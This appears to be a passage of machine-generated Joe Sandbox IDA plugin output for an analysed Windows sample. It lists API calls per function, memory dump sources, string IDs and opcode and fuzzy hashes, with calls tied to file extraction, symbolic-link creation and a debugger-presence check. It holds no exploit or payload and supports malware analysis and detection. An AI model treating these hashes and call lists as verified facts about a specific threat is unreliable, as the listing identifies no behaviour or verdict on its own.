                                • Opcode ID: 93e78a622899911f061d15df204f5ca73cd709dc56029b5105649c7768d16ae8
                                • Instruction ID: 1b3a58625109726a68947af77682e736e2eddc02298d765b2b6e56835e5a97d2
                                • Opcode Fuzzy Hash: 93e78a622899911f061d15df204f5ca73cd709dc56029b5105649c7768d16ae8
                                • Instruction Fuzzy Hash: 46B011300A020A8A8E002F30CC088283A20EA2230A30082A0A00ACA0A0CB22C022AA00
                                APIs
                                • SetCurrentDirectoryW.KERNELBASE(?,00D7A587,C:\Users\user\Desktop,00000000,00DA946A,00000006), ref: 00D7A326
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CurrentDirectory
                                • String ID:
                                • API String ID: 1611563598-0
                                • Opcode ID: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                                • Instruction ID: 8a08b5a57d564e8500a5b26abe9b2534fb3e2802d2375116c05d40432ab9bc58
                                • Opcode Fuzzy Hash: 20b690ca146bf4cf4fd8a3f705cdc35ae1d5082efb6f0a682f16e15761927db4
                                • Instruction Fuzzy Hash: 55A01230194206568A000B30CC09C1576505760702F0086227002C00B0CB308C14A510
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D7B971
                                • EndDialog.USER32(?,00000006), ref: 00D7B984
                                • GetDlgItem.USER32(?,0000006C), ref: 00D7B9A0
                                • SetFocus.USER32(00000000), ref: 00D7B9A7
                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D7B9E1
                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D7BA18
                                • FindFirstFileW.KERNEL32(?,?), ref: 00D7BA2E
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D7BA4C
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BA5C
                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BA78
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BA94
                                • _swprintf.LIBCMT ref: 00D7BAC4
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D7BAD7
                                • FindClose.KERNEL32(00000000), ref: 00D7BADE
                                • _swprintf.LIBCMT ref: 00D7BB37
                                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D7BB4A
                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D7BB67
                                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D7BB87
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7BB97
                                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D7BBB1
                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D7BBC9
                                • _swprintf.LIBCMT ref: 00D7BBF5
                                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D7BC08
                                • _swprintf.LIBCMT ref: 00D7BC5C
                                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D7BC6F
                                  • Part of subcall function 00D7A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                                  • Part of subcall function 00D7A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                • API String ID: 797121971-1840816070
                                • Opcode ID: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                                • Instruction ID: 749702fae427d4f4c53517beb40b0c9db68c984970534c8cbbfe34097b30b4ea
                                • Opcode Fuzzy Hash: 9c3872564e99103d4acf27ffa6169011c86a9e8a4cd12da44ec5e882c62d2a3f
                                • Instruction Fuzzy Hash: A5919372248349BFD7219BA0DC49FFB77ACEB49714F04481AF789D2191EB719A048B72
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67191
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D672F1
                                • CloseHandle.KERNEL32(00000000), ref: 00D67301
                                  • Part of subcall function 00D67BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D67C04
                                  • Part of subcall function 00D67BF5: GetLastError.KERNEL32 ref: 00D67C4A
                                  • Part of subcall function 00D67BF5: CloseHandle.KERNEL32(?), ref: 00D67C59
                                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D6730C
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D6741A
                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D67446
                                • CloseHandle.KERNEL32(?), ref: 00D67457
                                • GetLastError.KERNEL32 ref: 00D67467
                                • RemoveDirectoryW.KERNEL32(?), ref: 00D674B3
                                • DeleteFileW.KERNEL32(?), ref: 00D674DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                • API String ID: 3935142422-3508440684
                                • Opcode ID: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                                • Instruction ID: 7b579a0730a4de2533f4f96ec41e2eb9d2571d8990716da809bcf73dc630a82a
                                • Opcode Fuzzy Hash: 77e66f75d1d2bbb09f94d2013e1db362334ef9c3903aba1d7d7d2b77eb27f157
                                • Instruction Fuzzy Hash: 3BB1C271904219ABDF20DFA4DC45BEEBBB8EF04704F0445A9F949E7242DB34AA49CB71
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog_memcmp
                                • String ID: CMT$h%u$hc%u
                                • API String ID: 3004599000-3282847064
                                • Opcode ID: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                                • Instruction ID: d774385f8733c048206ac937f1803f88f5de1216fc1bc6ade564f34ec8fed213
                                • Opcode Fuzzy Hash: d9aff0505aea46dafe57306f1d70c26eb16ca2ea68985ec2792dbdc308dbd3a2
                                • Instruction Fuzzy Hash: 74328E715147849FDF14DF64C896AEA37A5EF55300F08457EFD8A8B282EB70AA48CB70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                • Opcode ID: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                                • Instruction ID: d70630221f55ae431ec6e807abb848c15090aa03b7b82adb908d4e09870a342c
                                • Opcode Fuzzy Hash: 87f9838cb50a149a67c4edb36208da15769dae42bedaf743474213a4a421efef
                                • Instruction Fuzzy Hash: B3C25C71E086288FDB25EF28DD407E9B3B6EB44315F1945EAD44DE7280E774AE818F60
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D627F1
                                • _strlen.LIBCMT ref: 00D62D7F
                                  • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,0001042C), ref: 00D71396
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D62EE0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                • String ID: CMT
                                • API String ID: 1706572503-2756464174
                                • Opcode ID: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                                • Instruction ID: 3c7de7424393a65ab9960e32bf7ad876f14a24d50efd784c8da7f17392566433
                                • Opcode Fuzzy Hash: 115eaf4443a83e98a679086f707aa349af4365f61c51000740bd975113d6de05
                                • Instruction Fuzzy Hash: 0D62E2715106848FDF18DF68C8956FA3BE1EF58304F09457EEC9A8B286DB70A949CB70
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D88767
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D88771
                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D8877E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                                • Instruction ID: 3cfe90e04c16ed280d3ff0eee0612e5462055ed4ca8ce13fe0e08e130d8d5f48
                                • Opcode Fuzzy Hash: b55934d86301b9f226436114307a719f2f1e41507ed5034f8a5d01aabe7fe070
                                • Instruction Fuzzy Hash: 4931B5759013289BCB21DF64DC89B9DBBB8EF08310F5041EAE90CA7251EB349B858F55
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                • Instruction ID: 38aa944026b58aedc1c4bbaac0279b64a78b62f6d420832ecb8a20ca14034957
                                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                • Instruction Fuzzy Hash: 0A021C71E11119DBDF14DFA9C8806ADBBF1EF48314F29816AE919E7284D731AD418BA0
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D7A662
                                • GetNumberFormatW.KERNEL32(00000400,00000000,?,00D9E600,?,?), ref: 00D7A6B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FormatInfoLocaleNumber
                                • String ID:
                                • API String ID: 2169056816-0
                                • Opcode ID: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                                • Instruction ID: 41a9f712b228579107aca205cafbb314140d83e3ddac2b71721c945c1476f9d3
                                • Opcode Fuzzy Hash: 3187118788c700bdceadb93c1d4406dc4d53c44c8c9dfbb54a06000c38c32a31
                                • Instruction Fuzzy Hash: 05014C36100308EADB10CF65EC05F9B77BCEF19710F005922BA08E7260D3709A248BB5
                                APIs
                                • GetLastError.KERNEL32(00D7117C,?,00000200), ref: 00D66EC9
                                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00D66EEA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                                • Instruction ID: 14eaf5b3ac08c2de00d47b10c216ba49f12ce54b1f7e1ad587e460fd264a76ca
                                • Opcode Fuzzy Hash: ffbba8cc8f22633e47f1f33e2af1cd606659047b0c1fe0e0bbe06b56c263d239
                                • Instruction Fuzzy Hash: 47D0C9353C8302BFEB110E75CC06F2B7BA4A755B82F20C515B35AE90E1CA71D424D639
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D9118F,?,?,00000008,?,?,00D90E2F,00000000), ref: 00D913C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                                • Instruction ID: 30544cf309b974ffc2263b41a384ca18f91a25eb26b96bc41b3e6ad777ad1673
                                • Opcode Fuzzy Hash: 0c1d3045bf61364945af8648e16b841c05e0fc4689ffb22af72274c656caf11b
                                • Instruction Fuzzy Hash: 6DB16D3961060ADFDB15CF28C48AB657BE0FF09364F298658E8D9CF2A1C335E981CB54
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID: gj
                                • API String ID: 0-4203073231
                                • Opcode ID: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                                • Instruction ID: b33577070b2bec7cd32f42441a5f16729029b5597b9da957ef4b090b8016a4b6
                                • Opcode Fuzzy Hash: 7e6bbbe660ba5eb3de5972ba8c866f3ea88ef2f4e87a60cc35786ec04c379f9d
                                • Instruction Fuzzy Hash: 31F1C3B1A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E635E9558B56
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Version
                                • String ID:
                                • API String ID: 1889659487-0
                                • Opcode ID: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                                • Instruction ID: fa335a2f04ff6fb09882e15e86edf32f96f7745a06db4d693d28f0a45bb41484
                                • Opcode Fuzzy Hash: 2d8a9ce695acd026cfd20d737a8c97236663fc879aeb78ae1122b47fc5a72c6b
                                • Instruction Fuzzy Hash: 15F017B490030C8FCB28CF18EC426E977B5FB59715F20029AD959A3764E3B0AD408EB2
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00D7EAC5), ref: 00D7F068
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                                • Instruction ID: 6f2799a97630ec1fb5a436df9fd25319dc4137fc2c2989a873d6a3b77b5818c9
                                • Opcode Fuzzy Hash: 88e4d52b0ab7d7a4802f565401675c83041787b579eebfab237f54bb818d3c58
                                • Instruction Fuzzy Hash:
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                                • Instruction ID: a34542a1574f1bab64e02e56bf6493fe86c363340d7dee7b8dbe3bfda2ebb539
                                • Opcode Fuzzy Hash: 0dcf499ec68d25ce5e29b67fa6f91ff498b8ca5723829558bf1322441c12266f
                                • Instruction Fuzzy Hash: D3A001B86413128B97408F76AA096093AA9BA46695709826AA509D6271EA2485609F21
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                • Instruction ID: 150ccba2a48775f81be42f664f8417cc34ce46d94a69c0e42faafa6df099aab6
                                • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                • Instruction Fuzzy Hash: DB62E471604B859FCB29CF28C8906B9BBE1AF55304F08C56DD8EE8B746F630E945CB21
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
